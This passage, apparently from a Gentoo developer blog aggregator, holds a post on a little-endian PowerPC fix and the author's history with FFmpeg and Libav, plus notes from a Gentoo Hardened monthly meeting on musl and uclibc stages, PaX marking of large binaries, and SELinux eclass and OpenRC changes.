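echo "$PS1"   # the stored value still contains the literal $?
```

With double quotes you would instead escape the dollar sign (\$?) so it survives the assignment, which is exactly the escaping that is easy to forget.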

Luca Barbato a.k.a. lu_zero (homepage, bugs)
PowerPC is back (and little endian) (August 30, 2014, 17:32 UTC)

Yesterday I fixed a PowerPC issue that had been around for ages; it is an endianness issue, and (funnily enough) it is on the little-endian flavour of the architecture.


I have some ties with this architecture: my interest in it (and in Altivec/VMX in particular) is what made me start contributing to MPlayer while fixing issues on Gentoo, from there hack on the FFmpeg of the time and meet the VLC people, and eventually part ways with Michael Niedermayer and, with the other main contributors of FFmpeg, create Libav. Quite a long way back in time.

Big endian, Little Endian

It is a bit surprising that IBM decided to use little endian (since big endian is MUCH nicer for I/O processing such as networking) but they might have their reasons.

PowerPC has traditionally been bi-endian, with the ability to switch on the fly between the two (this made foreign-endian simulators slightly less annoying to manage), but the main endianness had always been big.

This brings us to a quite interesting problem: some, if not most, of the PowerPC code had been written thinking in big endian. Luckily, since most of the code was written using C intrinsics (bless whoever made the Altivec intrinsics not as terrible as the other ones around), it won't be that hard to recycle most of it.

More will follow.

August 29, 2014
Sven Vermeulen a.k.a. swift (homepage, bugs)
Gentoo Hardened August meeting (August 29, 2014, 14:43 UTC)

Another month has passed, so we had another online meeting to discuss the progress within Gentoo Hardened.

Lead elections

The yearly lead elections within Gentoo Hardened were up again. Zorry (Magnus Granberg) was re-elected as project lead so doesn’t need to update his LinkedIn profile yet ;-)


blueness (Anthony G. Basile) has been working on the uclibc stages for some time. Due to the configurable nature of these setups, many /etc/portage files were provided as part of the stages, which shouldn't happen. Work is underway to update this accordingly.

For the musl setup, blueness is also rebuilding the stages to use a symbolic link to the dynamic linker (/lib/ as recommended by the musl maintainers.

Kernel and grsecurity with PaX

A bug has been submitted which shows that large binary files (in the bug, a chrome binary with debug information is shown to be more than 2 Gb in size) cannot be pax-mark'ed, with paxctl informing the user that the file is too big. The problem occurs when the PaX marks are in ELF (as the application mmaps the binary); users of extended-attributes-based PaX markings do not have this problem. blueness is working on making things a bit more intelligent, and on fixing this.


I have been making a few changes to the SELinux setup:

  • The live ebuilds (those with version 9999 which use the repository policy rather than snapshots of the policies) are now being used as “master” in case of releases: the ebuilds can just be copied to the right version to support the releases. The release script inside the repository is adjusted to reflect this as well.
  • The SELinux eclass now supports two variables, SELINUX_GIT_REPO and SELINUX_GIT_BRANCH, which allows users to use their own repository, and developers to work in specific branches together. By setting the right value in the users’ make.conf switching policy repositories or branches is now a breeze.
  • Another change in the SELinux eclass is that, after the installation of SELinux policies, we will check the reverse dependencies of the policy package and relabel the files of these packages. This allows us to only have RDEPEND dependencies towards the SELinux policy packages (if the application itself does not otherwise link with libselinux), making the dependency tree within the package manager more correct. We still need to update these packages to drop the DEPEND dependency, which is something we will focus on in the next few months.
  • In order to support improved cooperation between SELinux developers in the Gentoo Hardened team – perfinion (Jason Zaman) is in the queue for becoming a new developer in our midst – a coding style for SELinux policies is being drafted. This is of course based on the coding style of the reference policy, but with some Gentoo-specific improvements and more clarifications.
  • perfinion has been working on improving the SELinux support in OpenRC (release 0.13 and higher), making some of the additions that we had to make in the past – such as the selinux_gentoo init script – obsolete.

The meeting also discussed a few bugs in more detail, but if you really want to know, just hang on and wait for the IRC logs ;-) Other usual sections (system integrity and profiles) did not have any notable topics to describe.